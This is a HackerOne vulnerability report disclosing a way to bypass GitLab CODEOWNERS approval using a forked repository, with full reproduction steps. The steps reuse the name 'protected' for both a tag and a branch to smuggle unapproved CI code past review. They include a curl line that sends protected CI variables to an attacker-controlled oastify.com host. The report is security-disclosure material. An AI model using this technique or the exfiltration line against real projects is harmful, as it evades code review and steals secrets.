Bypassing Codeowners approve using fork repo
HackerOne report #2418591 by ali_shehab
on 2024-03-15, assigned to @rshambhuni:
Report
Summary
Hey team hope you are doing well. I found another way to bypass codeowners approvals but this time using a forked repo. Allowing to read protected vars of a private group and pushing code to protected branch.
Steps to reproduce
As an owner:
- Create a new group, and apply the ultimate trial to it
- Create a new private project in that group
- Create a
CODEOWNERS
file, with the following content
[Code Owners]
*.yml [@]OWNER_USERNAME
- Create a
.gitlab-ci.yml
file, with the following content
my_job:
script:
- echo "Hello"
- Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/repository, allow developers and maintainers to merge and toggle on code owners approval
- Navigate to https://gitlab.com/GROUP/PROJECT/-/settings/merge_requests, and enable Remove approvals by Code Owners if their files changed
- Invite a developer to that group
As the developer:
- Fork that project
- In the forked project, create a new branch called,
protected
, and add any "safe" change to the.gitlab-ci.yml
file, something similar to
my_job:
script:
- echo "Hello, this is safe"
- Create an MR targeting the original project's main branch
As the owner:
- Approve the MR, the owner at this point is okay with that code being merged into main as it's safe
As the developer:
- In the forked project, create a tag called
protected
- In the forked project, on the
protected
branch add any change to the README.md (this doesn't require a code owner approval) - verify that the changes page in the MR is messed up - Back to the forked project, on the
protected
branch add any evil code to the.gitlab-cicd.yml
, something similar to
my_job:
script:
- echo "Hello, this is safe"
job_name:
script:
- curl -X GET "https://qlfb8ytseezdfmvtee92juuzeqkg85.oastify.com?VAR=$VAR" # any server controlled by the user
- Delete
protected
tag - On the MR changes page, create a commit that contains any change
- Verify that approve persisted, and merge the MR
Impact
Bypassing codeowners approval allowing to read-protected vars of the group and project without having permission, add to that, being able to push unapproved code to protected branches.
How To Reproduce
Please add reproducibility information to this section: